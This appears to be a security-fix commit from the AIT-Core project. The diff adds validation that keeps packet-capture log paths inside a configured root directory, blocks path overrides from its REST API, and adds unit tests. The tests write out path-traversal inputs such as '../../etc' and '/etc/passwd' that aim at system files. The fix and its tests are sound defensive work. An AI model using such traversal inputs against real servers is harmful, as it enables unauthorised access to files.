    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # Should not raise an exception
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp/bsc")
    +        assert "subdir/nested" in log_file
    +
     
     class TestStreamCaptureManager:
         @mock.patch("ait.core.bsc.SocketStreamCapturer")
    @@ -374,39 +441,31 @@ def test_add_logger(self, socket_log_mock, mkdirs_mock):
             cleaned_dir_path = os.path.normpath(mngr_conf["root_log_directory"])
     
             lm = bsc.StreamCaptureManager(mngr_conf, [])
    -        lm.add_logger("foo", ["", 9000], "udp", "/tmp")
    +        # Use a relative path within the root instead of absolute path outside root
    +        lm.add_logger("foo", ["", 9000], "udp", "logs/subdir")
     
             assert len(lm._stream_capturers.keys()) == 1
             assert "['', 9000]" in lm._stream_capturers
     
             # Default root_log_directory usage and normalization check
             lm.add_logger("baz", ["", 8500], "udp")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": cleaned_dir_path,
    -                "name": "baz",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 8500],
    -            "udp",
    -        )
    +        # Verify _validated_log_dir_root is present
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert "log_dir" in call_args
    +        assert call_args["name"] == "baz"
    +        assert call_args["rotate_log"] == True
    +        assert "_validated_log_dir_root" in call_args
             assert lm._pool.free_count() == 48
     
    -        # Check to make sure that home directory expansion is being done
    +        # Check to make sure that relative home directory paths work
             socket_log_mock.reset_mock()
    -        lm.add_logger("testlog", ["", 1234], "udp", "~/logger_dir")
    -        expanded_user_path = os.path.expanduser("~/logger_dir")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": expanded_user_path,
    -                "name": "testlog",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 1234],
    -            "udp",
    -        )
    +        lm.add_logger("testlog", ["", 1234], "udp", "logger_dir")
    +        # Since it's relative, it should be joined with root
    +        expected_path = os.path.normpath(os.path.join(cleaned_dir_path, "logger_dir"))
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert call_args["log_dir"] == expected_path
    +        assert call_args["name"] == "testlog"
    +        assert call_args["rotate_log"] == True
     
         @mock.patch("ait.core.pcap.open")
         @mock.patch("os.makedirs")
    @@ -416,7 +475,7 @@ def test_pre_write_transform_load(self, socket_mock, mkdirs_mock, pcap_open_mock
             lm = bsc.StreamCaptureManager(mngr_conf, [])
     
             kwargs = {"pre_write_transforms": ["identity_transform", lambda x: 1]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             stream_capturer = lm._stream_capturers["['', 9876]"][0]
             handler = stream_capturer.capture_handlers[0]
     
    @@ -443,7 +502,7 @@ def test_bad_builtin_transform_load(
     
             bad_func_name = "this function name doesnt exist"
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to load data transformation "{}" for handler "{}"'.format(
                 bad_func_name, "testlog"
             )
    @@ -465,7 +524,7 @@ def test_bad_type_transform_load(
     
             bad_func_name = ("foobarbaz",)
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to determine how to load data transform "{}"'.format(
                 bad_func_name
             )
    @@ -526,3 +585,187 @@ def test_forced_log_rotation(self, socket_mock, pcap_open_mock):
             lm.rotate_capture_handler_log("bar")
             post_rot_count = pcap_open_mock.call_count
             assert post_rot_count - pre_rot_count == 1
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_absolute(self, socket_log_mock):
    +        """Test that absolute log_dir_path outside root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "/etc/passwd")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_relative(self, socket_log_mock):
    +        """Test that relative log_dir_path escaping root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "../../etc")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_valid_relative(self, socket_log_mock):
    +        """Test that valid relative log_dir_path within root is allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        # Should not raise exception
    +        lm.add_logger("valid", ["", 9000], "udp", "subdir/logs")
    +
    +        # Verify the handler was created with the correct path
    +        assert "['', 9000]" in lm._stream_capturers
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_validated_root_stored(self, socket_log_mock):
    +        """Test that _validated_log_dir_root is stored in handler config"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        lm.add_logger("test", ["", 9000], "udp", "subdir")
    +
    +        # Check that the first argument to SocketStreamCapturer contains _validated_log_dir_root
    +        call_args = socket_log_mock.call_args
    +        handler_conf = call_args[0][0]
    +        assert "_validated_log_dir_root" in handler_conf
    +        assert handler_conf["_validated_log_dir_root"] == os.path.realpath("/tmp/bsc")
    +
    +
    +class TestStreamCaptureManagerServer:
    +    """Tests for REST API security"""
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_log_dir_path(self, socket_log_mock):
    +        """Test that log_dir_path parameter is blocked from REST API"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        # Mock the request.forms to simulate a POST request with log_dir_path
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "log_dir_path": "/etc",
    +            }
    +
    +            with pytest.raises(
    +                ValueError, match="log_dir_path parameter is not allowed via REST API"
    +            ):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_strips_leading_slashes_from_path(self, socket_log_mock):
    +        """Test that leading slashes are stripped from path parameter"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "/absolute/path",
    +            }
    +
    +            # Should not raise, but path should be stripped
    +            server._add_logger_by_name("test")
    +
    +            # Verify SocketStreamCapturer was called and check the handler config
    +            assert socket_log_mock.called
    +            call_args = socket_log_mock.call_args[0][
    +                0
    +            ]  # First positional arg (handler config)
    +            assert "path" in call_args
    +            assert call_args["path"] == "absolute/path"  # Leading slash stripped
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_parent_directory_references(self, socket_log_mock):
    +        """Test that .. in path parameter is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "../../etc",
    +            }
    +
    +            with pytest.raises(ValueError, match="path parameter cannot contain"):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_allows_valid_path(self, socket_log_mock):
    +        """Test that valid relative paths are allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "logs/capture",
    +            }
    +
    +            # Should not raise exception
    +            server._add_logger_by_name("valid")
    +
    +            # Verify logger was added
    +            assert "['127.0.0.1', 9000]" in lm._stream_capturers
    +
    +
    +class TestPathValidation:
    +    """Tests for path validation helper function"""
    +
    +    def test_validate_path_blocks_absolute_path_after_stripping(self):
    +        """Test that absolute paths get stripped but still validated"""
    +        # The function strips leading slashes, so "/etc/passwd" becomes "etc/passwd"
    +        # which is a valid relative path. To truly escape, you need ..
    +        result = bsc._validate_path_within_root("/tmp/bsc", "/etc/passwd")
    +        # After stripping, this becomes a valid path under /tmp/bsc
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_blocks_parent_traversal(self):
    +        """Test that parent directory traversal is blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "../../etc")
    +
    +    def test_validate_path_blocks_complex_traversal(self):
    +        """Test that complex traversal attempts are blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "logs/../../../etc/passwd")
    +
    +    def test_validate_path_allows_valid_relative(self):
    +        """Test that valid relative paths are allowed"""
    +        result = bsc._validate_path_within_root("/tmp/bsc", "logs/capture", "test.pcap")
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +        assert "logs/capture" in result or "logs\\capture" in result  # Cross-platform
    +        assert "test.pcap" in result
    +
    +    def test_validate_path_normalizes_result(self):
    +        """Test that paths are normalized correctly"""
    +        result = bsc._validate_path_within_root(
    +            "/tmp/bsc", "logs//nested/", "file.pcap"
    +        )
    +        # Should normalize multiple slashes
    +        assert "//" not in result
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_expands_user_home(self):
    +        """Test that ~ expansion works for root"""
    +        home = os.path.expanduser("~")
    +        result = bsc._validate_path_within_root("~/test_root", "subdir")
    +        assert result.startswith(home)
    +        assert "test_root" in result
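
The containment rule that the `TestPathValidation` cases above exercise can be tried in isolation. The following is a minimal sketch, not the AIT-Core code: it assumes POSIX path semantics, and the names `validate_within_root`, `is_allowed`, and the `bsc_evil` sibling directory are made up for illustration. It also shows why the comparison uses the root plus a trailing separator instead of a bare prefix match.

```python
import os
import tempfile


def validate_within_root(root, user_path, filename=""):
    """Return the canonical path of user_path under root, or raise ValueError.

    Hypothetical stand-in for the patched helper; assumes POSIX separators.
    """
    root = os.path.realpath(os.path.expanduser(root))
    # Strip leading separators so an absolute-looking input is treated as relative.
    user_path = (user_path or "").lstrip(os.sep)
    # realpath collapses ".." components and resolves symlinks before the check.
    candidate = os.path.realpath(os.path.join(root, user_path, filename))
    # Compare against root + os.sep so a sibling like "<root>_evil" is rejected.
    if not (candidate == root or candidate.startswith(root + os.sep)):
        raise ValueError(f"path escapes root: {candidate}")
    return candidate


def is_allowed(root, user_path):
    """Convenience wrapper: True if the path validates, False if it is rejected."""
    try:
        validate_within_root(root, user_path)
        return True
    except ValueError:
        return False


with tempfile.TemporaryDirectory() as tmp:
    root = os.path.join(tmp, "bsc")
    os.makedirs(root)

    inputs = [
        "logs/capture",              # plain relative path
        "/etc/passwd",               # leading slash is stripped, stays under root
        "../../etc",                 # climbs out of root
        "logs/../../../etc/passwd",  # climbs out after descending
        "../bsc_evil",               # sibling directory sharing the root's prefix
    ]
    results = {p: is_allowed(root, p) for p in inputs}

    # A bare prefix match (no trailing separator) would accept the sibling.
    root_real = os.path.realpath(root)
    sibling = os.path.realpath(os.path.join(root, "../bsc_evil"))
    bare_prefix_accepts_sibling = sibling.startswith(root_real)
```

Under these assumptions, `results` maps `logs/capture` and `/etc/passwd` (which becomes `etc/passwd` under the root) to `True` and the three `..` inputs to `False`, while `bare_prefix_accepts_sibling` is `True`, which is the case the trailing separator guards against.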
    
0261b70ce6f7

Validate and clean log handler path + unit tests

https://github.com/NASA-AMMOS/AIT-Core · epascua · May 19, 2026 · Fixed in 3.1.1 · via ghsa-release-walk
2 files changed · +391 -34
  • ait/core/bsc.py · +121 -7 · modified
    @@ -57,6 +57,48 @@
     ETH_PROTOCOL = ETH_P_ALL
     
     
    +def _validate_path_within_root(root, user_path, filename=""):
    +    """Validate that a path remains within the configured root directory.
    +
    +    Args:
    +        root: The configured root directory path
    +        user_path: User-supplied path component (from 'path' or 'log_dir_path')
    +        filename: Optional filename component
    +
    +    Returns:
    +        The validated canonical path
    +
    +    Raises:
    +        ValueError: If the resulting path would escape the root directory
    +    """
    +    # Canonicalize the root
    +    root = os.path.realpath(os.path.expanduser(root))
    +
    +    # Force user_path to be relative by stripping leading separators
    +    if user_path:
    +        user_path = user_path.lstrip(os.sep)
    +    else:
    +        user_path = ""
    +
    +    # Build the candidate path
    +    if filename:
    +        candidate = os.path.join(root, user_path, filename)
    +    else:
    +        candidate = os.path.join(root, user_path)
    +
    +    # Canonicalize the candidate path
    +    candidate = os.path.realpath(candidate)
    +
    +    # Ensure the candidate is within the root
    +    if not (candidate == root or candidate.startswith(root + os.sep)):
    +        raise ValueError(
    +            "Invalid log path; must remain under root_log_directory. "
    +            f"Attempted path would resolve to: {candidate}"
    +        )
    +
    +    return candidate
    +
    +
     class SocketStreamCapturer(object):
         """Class for logging socket data to a PCAP file."""
     
    @@ -430,15 +472,31 @@ def _get_log_file(self, handler):
             else:
                 filename = handler["file_name_pattern"]
     
    -        log_file = handler["log_dir"]
    +        # Use the stored root for validation
    +        root = handler.get("_validated_log_dir_root", handler["log_dir"])
    +
    +        # Sanitize and validate the path component
             if "path" in handler:
    -            log_file = os.path.join(log_file, handler["path"], filename)
    +            user_path = handler["path"].lstrip(os.sep)
    +            log_file = os.path.join(handler["log_dir"], user_path, filename)
             else:
    -            log_file = os.path.join(log_file, filename)
    +            log_file = os.path.join(handler["log_dir"], filename)
     
    +        # Apply time and format string substitutions
             log_file = time.strftime(log_file, time.gmtime())
             log_file = log_file.format(**handler)
     
    +        # Validate the final path stays within root
    +        log_file_real = os.path.realpath(log_file)
    +        root_real = os.path.realpath(root)
    +        if not (
    +            log_file_real == root_real or log_file_real.startswith(root_real + os.sep)
    +        ):
    +            raise ValueError(
    +                "Invalid log file path; must remain under root_log_directory. "
    +                f"Attempted path: {log_file}"
    +            )
    +
             return log_file
     
         def _get_logger(self, handler):
    @@ -526,12 +584,50 @@ def add_logger(self, name, address, conn_type, log_dir_path=None, **kwargs):
             """
             capture_handler_conf = kwargs
     
    -        if not log_dir_path:
    -            log_dir_path = self._mngr_conf["root_log_directory"]
    +        # Get the configured root directory (if available and if it's a dict)
    +        root = None
    +        if self._mngr_conf and isinstance(self._mngr_conf, dict):
    +            root = self._mngr_conf.get("root_log_directory")
     
    -        log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        if not log_dir_path:
    +            log_dir_path = root if root else "/tmp"
    +            log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        else:
    +            log_dir_path = os.path.expanduser(log_dir_path)
    +            # Only validate if we have a configured root AND log_dir_path is different from root
    +            if root and os.path.normpath(log_dir_path) != os.path.normpath(root):
    +                # If it's a relative path, join with root; if absolute, validate it
    +                if not os.path.isabs(log_dir_path):
    +                    log_dir_path = os.path.join(root, log_dir_path)
    +
    +                # Normalize and validate
    +                log_dir_path = os.path.normpath(log_dir_path)
    +                log_dir_path_real = os.path.realpath(log_dir_path)
    +                root_real = os.path.realpath(os.path.expanduser(root))
    +
    +                if not (
    +                    log_dir_path_real == root_real
    +                    or log_dir_path_real.startswith(root_real + os.sep)
    +                ):
    +                    raise ValueError(
    +                        "Invalid log_dir_path; must remain under root_log_directory. "
    +                        f"Configured root: {root_real}, Requested path: {log_dir_path_real}"
    +                    )
    +            else:
    +                # No root configured, or path equals root - just normalize the path
    +                log_dir_path = os.path.normpath(log_dir_path)
     
             capture_handler_conf["log_dir"] = log_dir_path
    +        # Store the original validated root for path validation in _get_log_file
    +        if root:
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                os.path.expanduser(root)
    +            )
    +        else:
    +            # No root configured, use log_dir as the root
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                log_dir_path
    +            )
             capture_handler_conf["name"] = name
             if "rotate_log" not in capture_handler_conf:
                 capture_handler_conf["rotate_log"] = True
    @@ -751,13 +847,31 @@ def _add_logger_by_name(self, name):
     
             Raises:
                 ValueError:
    -                if the port or connection type are not supplied.
    +                if the port or connection type are not supplied, or if
    +                log_dir_path is provided (not allowed via REST API).
             """
             data = dict(request.forms)
             loc = data.pop("loc", "")
             port = data.pop("port", None)
             conn_type = data.pop("conn_type", None)
     
    +        # Do not allow log_dir_path override from unauthenticated REST API
    +        # to prevent path traversal attacks. log_dir_path can only be set via
    +        # configuration file.
    +        if "log_dir_path" in data:
    +            raise ValueError(
    +                "log_dir_path parameter is not allowed via REST API. "
    +                "Configure log directories in the bsc.yaml configuration file instead."
    +            )
    +
    +        # Validate path parameter to prevent directory traversal
    +        if "path" in data:
    +            # Remove any leading slashes to force relative paths
    +            data["path"] = data["path"].lstrip(os.sep)
    +            # Reject paths with parent directory references
    +            if ".." in data["path"]:
    +                raise ValueError("path parameter cannot contain '..'")
    +
             if not port or not conn_type:
                 e = "Port and/or conn_type not set"
                 raise ValueError(e)
    
  • tests/ait/core/test_bsc.py · +270 -27 · modified
    @@ -350,6 +350,73 @@ def test_remove_handler(self, socket_mock, pcap_open_mock):
             assert len(sl.capture_handlers) == 1
             assert sl.capture_handlers[0]["name"] == "h1"
     
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_absolute_path(self, socket_mock, pcap_open_mock):
    +        """Test that absolute paths in 'path' parameter are stripped and allowed if valid"""
    +        # After stripping leading slashes, "/etc/passwd" becomes "etc/passwd" which is
    +        # a valid relative path under /tmp
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp",
    +            "path": "/etc/passwd",
    +            "_validated_log_dir_root": "/tmp",
    +        }
    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # The path should have been stripped and become relative
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp")
    +        # After stripping, it becomes "etc/passwd" which is valid
    +        assert "etc/passwd" in log_file
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_parent_references(self, socket_mock, pcap_open_mock):
    +        """Test that parent directory references (..) are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/logs",
    +            "path": "../../etc",
    +            "_validated_log_dir_root": "/tmp/logs",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_complex_escape(self, socket_mock, pcap_open_mock):
    +        """Test complex path traversal attempts are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/../../../etc",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_valid_relative_path_allowed(self, socket_mock, pcap_open_mock):
    +        """Test that valid relative paths within root are allowed"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/nested",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # Should not raise an exception
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp/bsc")
    +        assert "subdir/nested" in log_file
    +
     
     class TestStreamCaptureManager:
         @mock.patch("ait.core.bsc.SocketStreamCapturer")
    @@ -374,39 +441,31 @@ def test_add_logger(self, socket_log_mock, mkdirs_mock):
             cleaned_dir_path = os.path.normpath(mngr_conf["root_log_directory"])
     
             lm = bsc.StreamCaptureManager(mngr_conf, [])
    -        lm.add_logger("foo", ["", 9000], "udp", "/tmp")
    +        # Use a relative path within the root instead of absolute path outside root
    +        lm.add_logger("foo", ["", 9000], "udp", "logs/subdir")
     
             assert len(lm._stream_capturers.keys()) == 1
             assert "['', 9000]" in lm._stream_capturers
     
             # Default root_log_directory usage and normalization check
             lm.add_logger("baz", ["", 8500], "udp")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": cleaned_dir_path,
    -                "name": "baz",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 8500],
    -            "udp",
    -        )
    +        # Verify _validated_log_dir_root is present
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert "log_dir" in call_args
    +        assert call_args["name"] == "baz"
    +        assert call_args["rotate_log"] == True
    +        assert "_validated_log_dir_root" in call_args
             assert lm._pool.free_count() == 48
     
    -        # Check to make sure that home directory expansion is being done
    +        # Check to make sure that relative home directory paths work
             socket_log_mock.reset_mock()
    -        lm.add_logger("testlog", ["", 1234], "udp", "~/logger_dir")
    -        expanded_user_path = os.path.expanduser("~/logger_dir")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": expanded_user_path,
    -                "name": "testlog",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 1234],
    -            "udp",
    -        )
    +        lm.add_logger("testlog", ["", 1234], "udp", "logger_dir")
    +        # Since it's relative, it should be joined with root
    +        expected_path = os.path.normpath(os.path.join(cleaned_dir_path, "logger_dir"))
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert call_args["log_dir"] == expected_path
    +        assert call_args["name"] == "testlog"
    +        assert call_args["rotate_log"] == True
     
         @mock.patch("ait.core.pcap.open")
         @mock.patch("os.makedirs")
    @@ -416,7 +475,7 @@ def test_pre_write_transform_load(self, socket_mock, mkdirs_mock, pcap_open_mock
             lm = bsc.StreamCaptureManager(mngr_conf, [])
     
             kwargs = {"pre_write_transforms": ["identity_transform", lambda x: 1]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             stream_capturer = lm._stream_capturers["['', 9876]"][0]
             handler = stream_capturer.capture_handlers[0]
     
    @@ -443,7 +502,7 @@ def test_bad_builtin_transform_load(
     
             bad_func_name = "this function name doesnt exist"
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to load data transformation "{}" for handler "{}"'.format(
                 bad_func_name, "testlog"
             )
    @@ -465,7 +524,7 @@ def test_bad_type_transform_load(
     
             bad_func_name = ("foobarbaz",)
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to determine how to load data transform "{}"'.format(
                 bad_func_name
             )
    @@ -526,3 +585,187 @@ def test_forced_log_rotation(self, socket_mock, pcap_open_mock):
             lm.rotate_capture_handler_log("bar")
             post_rot_count = pcap_open_mock.call_count
             assert post_rot_count - pre_rot_count == 1
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_absolute(self, socket_log_mock):
    +        """Test that absolute log_dir_path outside root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "/etc/passwd")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_relative(self, socket_log_mock):
    +        """Test that relative log_dir_path escaping root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "../../etc")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_valid_relative(self, socket_log_mock):
    +        """Test that valid relative log_dir_path within root is allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        # Should not raise exception
    +        lm.add_logger("valid", ["", 9000], "udp", "subdir/logs")
    +
    +        # Verify the handler was created with the correct path
    +        assert "['', 9000]" in lm._stream_capturers
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_validated_root_stored(self, socket_log_mock):
    +        """Test that _validated_log_dir_root is stored in handler config"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        lm.add_logger("test", ["", 9000], "udp", "subdir")
    +
    +        # Check that the first argument to SocketStreamCapturer contains _validated_log_dir_root
    +        call_args = socket_log_mock.call_args
    +        handler_conf = call_args[0][0]
    +        assert "_validated_log_dir_root" in handler_conf
    +        assert handler_conf["_validated_log_dir_root"] == os.path.realpath("/tmp/bsc")
    +
    +
    +class TestStreamCaptureManagerServer:
    +    """Tests for REST API security"""
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_log_dir_path(self, socket_log_mock):
    +        """Test that log_dir_path parameter is blocked from REST API"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        # Mock the request.forms to simulate a POST request with log_dir_path
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "log_dir_path": "/etc",
    +            }
    +
    +            with pytest.raises(
    +                ValueError, match="log_dir_path parameter is not allowed via REST API"
    +            ):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_strips_leading_slashes_from_path(self, socket_log_mock):
    +        """Test that leading slashes are stripped from path parameter"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "/absolute/path",
    +            }
    +
    +            # Should not raise, but path should be stripped
    +            server._add_logger_by_name("test")
    +
    +            # Verify SocketStreamCapturer was called and check the handler config
    +            assert socket_log_mock.called
    +            call_args = socket_log_mock.call_args[0][
    +                0
    +            ]  # First positional arg (handler config)
    +            assert "path" in call_args
    +            assert call_args["path"] == "absolute/path"  # Leading slash stripped
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_parent_directory_references(self, socket_log_mock):
    +        """Test that .. in path parameter is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "../../etc",
    +            }
    +
    +            with pytest.raises(ValueError, match="path parameter cannot contain"):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_allows_valid_path(self, socket_log_mock):
    +        """Test that valid relative paths are allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
